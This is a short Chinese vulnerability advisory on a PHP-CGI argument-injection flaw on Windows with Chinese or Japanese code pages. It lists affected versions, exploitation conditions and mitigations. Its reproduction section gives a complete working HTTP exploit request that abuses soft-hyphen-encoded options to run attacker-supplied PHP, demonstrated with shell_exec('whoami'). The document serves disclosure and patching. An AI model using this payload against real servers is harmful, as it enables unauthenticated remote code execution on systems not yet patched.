一、漏洞介绍
PHP 在设计时忽略 Windows 中对字符转换的Best-Fit 特性,当 PHP-CGI 运行在Window平台且使用了如下语系(简体中文936/繁体中文950/日文932等)时,攻击者可构造恶意请求绕过 CVE-2012-1823 补丁,从而可在无需登录的情况下执行任意PHP代码。
二、影响版本
8.3 ≤ version < 8.3.8
8.2 ≤ version < 8.2.20
8.1 ≤ version < 8.1.29
三、利用条件
漏洞利用条件:
直接使用php-cgi启动
在Window平台且使用了如下语系(简体中文936/繁体中文950/日文932等)
四、漏洞复现
1.漏洞复现使用的是XAMPP for Windows 8.2.12版本
GET /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1
Host: 10.10.10.131
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Length: 34
<?php echo shell_exec('whoami');?>
五、漏洞修复
1、官方已发布安全更新,建议升级至最新版本。
2、若无法更新至新版本,且若PHP运行于Window平台上,建议关闭php-cgi的使用。
3、XAMPP尚未针对此漏洞发布相对应的更新安装说明
推荐站内搜索:最好用的开发软件、免费开源系统、渗透测试工具云盘下载、最新渗透测试资料、最新黑客工具下载……
还没有评论,来说两句吧...